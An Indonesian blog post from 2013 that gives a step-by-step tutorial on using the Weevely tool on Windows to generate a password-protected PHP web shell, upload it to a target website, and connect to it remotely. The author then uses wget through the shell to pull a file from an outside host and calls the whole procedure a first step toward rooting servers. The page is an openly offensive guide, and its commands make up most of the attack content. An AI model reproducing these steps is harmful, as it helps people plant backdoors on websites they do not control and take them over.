Sunday, December 29, 2013

Tutorial BackConnect Dengan Weevely | in Windows

GoogleNewws.blogspot.comMeskipun baru nyoba tadi, saya share aja deh. Sekalian biar tutornya kesimpen di blog. Biar enak kalo mau nyari-nyari lagi. Hehehehehe. Agak pusing nyari tutor Back Connect rata rata suruh pakai Netcat . Nah, apesnya, mungkin karena saya yang bego, ditunggu sampai satu jam gak mau connect ke server, padahal command-command yang saya jalankan sudah betul :(
Oke langsung s aja, gak usah basa-basi :p .
Bagi yang belum punya, download dulu bahan-bahannya :
Python
Python Read Line
Weevely

Install semua bahan diatas.
Untuk Weevely, saya ekstrak di direktori C:\tools\weevely\ . Jadi nanti command commandnya ngikutin sendiri ya :p
Pertama , buka CMD, arahkan ke folder tempat sobat mengekstrak weevely tadi .
cd C:\tools\weevely
Lalu kita coba membuat file php dengan perintah main.py -g -o namashell.php -p password
contoh : main.py -g -o akicha.php -p akicha
Tunggu sampai proses selesai. Lihat SS :
Step 1
Buka folder weevely, pasti ada file akicha.php, lalu upload ke web target. Di public_html saja biar gampang
Step 2
Langkah ke tiga, masukkan command berikut :
main.py -t -u http://target.com/akicha.php -p akicha
Tunggu sampai proses selesai :)
Sip, backconnect sukses.
Simpel kan ? :D
Bagaimana kok saya tau kalo backconnect sukses ?
Saya test dengan menggunakan fingsi wget
wget http://newbieakicha.tk/x.txt
Hasilnya ?
http://sitotis.net/x.txt
wew, orang ganteng >.<
Sebenarnya tutorial ini adalah awalan saat kita ingin melakukan roting . Cuman karena saya belum bisa rooting, tutorial cukup sampai disini saja :p . Doakan supaya cepat bisa ngeroot server :3

Source: Madura Cyber

Berlangganan artikel via email :

Delivered by Google Newws

Share On:

Related Post:

Belum ada komentar untuk "Tutorial BackConnect Dengan Weevely | in Windows"

Post a Comment

Jika Ingin Memberikan Komentar Harap Memakai Bahasa yang SOPAN Jika Memakai Bahasa yang Tidak SOPAN Komentar Akan dihapus Karena Komentar Blog Google Newws Tidak Memakai Moderasi Komentar & Terbuka Untuk Siapapun

Terima Kasih

 
 
All Right Reserved - Google Newws | Share It
Design by Google Newws | Like Our Fanspage Google Newws